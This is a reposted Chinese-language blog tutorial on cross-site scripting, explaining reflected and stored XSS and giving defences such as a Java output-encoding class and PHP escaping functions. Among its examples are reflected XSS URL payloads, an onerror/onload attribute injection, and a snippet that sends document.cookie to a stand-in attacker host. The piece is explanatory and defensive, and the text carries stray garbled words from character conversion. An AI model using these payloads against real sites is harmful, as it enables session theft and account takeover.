xss攻擊原理與解決方法
概述
XSS攻擊是Web攻擊中最多見的攻擊方法之一,它是經過對網頁注入可執行代碼且成功地被瀏覽器 執行,達到攻擊的目的,造成了一次有效XSS攻擊,一旦攻擊成功,它能夠獲取用戶的聯繫人列 表,而後向聯繫人發送虛假詐騙信息,能夠刪除用戶的日誌等等,有時候還和其餘攻擊方式同時實 施好比SQL注入攻擊服務器和數據庫、Click劫持、相對連接劫持等實施釣魚,它帶來的危害是巨 大的,是web安全的頭號大敵。javascript
攻擊的條件
實施XSS攻擊須要具有兩個條件:css
1、須要向web頁面注入惡意代碼;html
2、這些惡意代碼可以被瀏覽器成功的執行。java
看一下下面這個例子:node
<div id="el" style="background:url('javascript:eval(document.getElementById("el").getAttribute("code")) ')"
code="var a = document.createElement('a');
a.innerHTML= '執行了惡意代碼';document.body.appendChild(a);
//這這裏執行代碼
"></div>
這段代碼在舊版的IE8和IE8如下的版本都是能夠被執行的,火狐也能執行代碼,但火狐對其禁止訪問DOM對象,因此在火狐下執行將會看到控制裏拋出異常:document is not defined (document是沒有定義的)。程序員
再來看一下面這段代碼:web
<div>
<img src="/images/handler.ashx?id=<%= Request.QueryString["id"] %>" />
</div>
相信不少程序員都以爲這個代碼很正常,其實這個代碼就存在一個反射型的XSS攻擊,假如輸入下面的地址:數據庫
http://www.xxx.com/?id=" /><script>alert(/xss/)</script><br x=" 最終反射出來的HTML代碼: <div> <img src="/images/handler.ashx?id=" /><script>alert(/xss/)</script><br x="" /> </div>
也許您會以爲把ValidateRequest設置爲true或者保持默認值就能高枕無憂了,其實這種狀況還能夠輸入下面的地址達到相同的攻擊效果:json
http://www.xxx.com/?id=xx" onerror="this.onload()" onload="alert(/xss/)" x="
根據XSS攻擊的效果能夠分爲幾種類型
第1、XSS反射型攻擊,惡意代碼並無保存在目標網站,經過引誘用戶點擊一個連接到目標網站的惡意連接來實施攻擊的。瀏覽器
第2、XSS存儲型攻擊,惡意代碼被保存到目標網站的服務器中,這種攻擊具備較強的穩定性和持久性,比較常見場景是在博客,論壇等社交網站上,但OA系統,和CRM系統上也能看到它身影,好比:某CRM系統的客戶投訴功能上存在XSS存儲型漏洞,黑客提交了惡意攻擊代碼,當系統管理員查看投訴信息時惡意代碼執行,竊取了客戶的資料,然而管理員絕不知情,這就是典型的XSS存儲型攻擊。
XSS攻擊能作些什麼
1.竊取cookies,讀取目標網站的cookie發送到黑客的服務器上,以下面的代碼:
var i=document.createElement("img")
document.body.appendChild(i)
i.src = "http://www.hackerserver.com/?c=" + document.cookie
2.讀取用戶未公開的資料,若是:郵件列表或者內容、系統的客戶資料,聯繫人列表等等,如代碼:
解決方法
一種方法是在表單提交或者url參數傳遞前,對須要的參數進行過濾,請看以下XSS過濾工具類代碼
1 import java.net.URLEncoder; 2 3 /** 4 * 過濾非法字符工具類 5 * 6 */ 7 public class EncodeFilter { 8 9 10 public static String encode(String input) { 11 if (input == null) { 12 return input; 13 } 14 StringBuilder sb = new StringBuilder(input.length()); 15 for (int i = 0, c = input.length(); i < c; i++) { 16 char ch = input.charAt(i); 17 switch (ch) { 18 case '&': sb.append("&"); 19 break; 20 case '<': sb.append("<"); 21 break; 22 case '>': sb.append(">"); 23 break; 24 case '"': sb.append("""); 25 break; 26 case '\'': sb.append("'"); 27 break; 28 case '/': sb.append("/"); 29 break; 30 default: sb.append(ch); 31 } 32 } 33 return sb.toString(); 34 } 35 36 37 public static String encodeForJS(String input) { 38 if (input == null) { 39 return input; 40 } 41 42 StringBuilder sb = new StringBuilder(input.length()); 43 44 for (int i = 0, c = input.length(); i < c; i++) { 45 char ch = input.charAt(i); 46 47 48 if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z' || 49 ch >= '0' && ch <= '9' || 50 ch == ',' || ch == '.' || ch == '_') { 51 sb.append(ch); 52 } else { 53 String temp = Integer.toHexString(ch); 54 55 56 if (ch < 256) { 57 sb.append('\\').append('x'); 58 if (temp.length() == 1) { 59 sb.append('0'); 60 } 61 sb.append(temp.toLowerCase()); 62 63 64 } else { 65 sb.append('\\').append('u'); 66 for (int j = 0, d = 4 - temp.length(); j < d; j ++) { 67 sb.append('0'); 68 } 69 sb.append(temp.toUpperCase()); 70 } 71 } 72 } 73 74 return sb.toString(); 75 } 76 77 /** 78 * css非法字符過濾 79 * http://www.w3.org/TR/CSS21/syndata.html#escaped-characters 80 */ 81 public static String encodeForCSS(String input) { 82 if (input == null) { 83 return input; 84 } 85 86 StringBuilder sb = new StringBuilder(input.length()); 87 88 for (int i = 0, c = input.length(); i < c; i++) { 89 char ch = input.charAt(i); 90 91 92 if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z' || 93 ch >= '0' && ch <= '9') { 94 sb.append(ch); 95 } else { 96 97 sb.append('\\').append(Integer.toHexString(ch)).append(' '); 98 } 99 } 100 return sb.toString(); 101 } 102 103 /** 104 * URL參數編碼 105 * http://en.wikipedia.org/wiki/Percent-encoding 106 */ 107 public static String encodeURIComponent(String input) { 108 return encodeURIComponent(input, "utf-8"); 109 } 110 111 public static String encodeURIComponent(String input, String encoding) { 112 if (input == null) { 113 return input; 114 } 115 String result; 116 try { 117 result = URLEncoder.encode(input, encoding); 118 } catch (Exception e) { 119 result = ""; 120 } 121 return result; 122 } 123 124 public static boolean isValidURL(String input) { 125 if (input == null || input.length() < 8) { 126 return false; 127 } 128 char ch0 = input.charAt(0); 129 if (ch0 == 'h') { 130 if (input.charAt(1) == 't' && 131 input.charAt(2) == 't' && 132 input.charAt(3) == 'p') { 133 char ch4 = input.charAt(4); 134 if (ch4 == ':') { 135 if (input.charAt(5) == '/' && 136 input.charAt(6) == '/') { 137 138 return isValidURLChar(input, 7); 139 } else { 140 return false; 141 } 142 } else if (ch4 == 's') { 143 if (input.charAt(5) == ':' && 144 input.charAt(6) == '/' && 145 input.charAt(7) == '/') { 146 147 return isValidURLChar(input, 8); 148 } else { 149 return false; 150 } 151 } else { 152 return false; 153 } 154 } else { 155 return false; 156 } 157 158 } else if (ch0 == 'f') { 159 if( input.charAt(1) == 't' && 160 input.charAt(2) == 'p' && 161 input.charAt(3) == ':' && 162 input.charAt(4) == '/' && 163 input.charAt(5) == '/') { 164 165 return isValidURLChar(input, 6); 166 } else { 167 return false; 168 } 169 } 170 return false; 171 } 172 173 static boolean isValidURLChar(String url, int start) { 174 for (int i = start, c = url.length(); i < c; i ++) { 175 char ch = url.charAt(i); 176 if (ch == '"' || ch == '\'') { 177 return false; 178 } 179 } 180 return true; 181 } 182 183 }
2、 過濾用戶輸入的 檢查用戶輸入的內容中是否有非法內容。如<>(尖括號)、」(引號)、 ‘(單引號)、%(百分比符號)、;(分號)、()(括號)、&(& 符號)、+(加號)等。、嚴格控制輸出
能夠利用下面這些函數對出現xss漏洞的參數進行過濾 1、htmlspecialchars() 函數,用於轉義處理在頁面上顯示的文本。 2、htmlentities() 函數,用於轉義處理在頁面上顯示的文本。 3、strip_tags() 函數,過濾掉輸入、輸出裏面的惡意標籤。 四、header() 函數,使用header("Content-type:application/json"); 用於控制 json 數據的頭部,不用於瀏覽。 5、urlencode() 函數,用於輸出處理字符型參數帶入頁面連接中。 6、intval() 函數用於處理數值型參數輸出頁面中。 7、自定義函數,在大多狀況下,要使用一些經常使用的 html 標籤,以美化頁面顯示,如留言、小紙條。那麼在這樣的狀況下,要採用白名單的方法使用合法的標籤顯示,過濾掉非法的字符。 各語言示例: PHP的htmlentities()或是htmlspecialchars()。 Python的cgi.escape()。 ASP的Server.HTMLEncode()。 ASP.NET的Server.HtmlEncode()或功能更強的Microsoft Anti-Cross Site Scripting Library Java的xssprotect(Open Source Library)。 Node.js的node-validator。
原文:https://blog.csdn.net/qq_21956483/article/details/54377947
相關文章
- 1. 淺談XSS攻擊原理與解決方法
- 2. xss原理、攻擊方式與防護
- 3. XSS攻擊原理
- 4. 防XSS攻擊解決方法
- 5. XSS攻擊的解決方法
- 6. 解決XSS攻擊
- 7. 155.XSS攻擊原理
- 8. XSS攻擊與CSRF攻擊
- 9. django-xss攻擊原理與防範
- 10. php XSS攻擊原理與防護
- 更多相關文章...
- • SVN 解決衝突 - SVN 教程
- • BASE原理與最終一致性 - NoSQL教程
- • Java Agent入門實戰(三)-JVM Attach原理與使用
- • SpringBoot中properties文件不能自動提示解決方法
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. 淺談XSS攻擊原理與解決方法
- 2. xss原理、攻擊方式與防護
- 3. XSS攻擊原理
- 4. 防XSS攻擊解決方法
- 5. XSS攻擊的解決方法
- 6. 解決XSS攻擊
- 7. 155.XSS攻擊原理
- 8. XSS攻擊與CSRF攻擊
- 9. django-xss攻擊原理與防範
- 10. php XSS攻擊原理與防護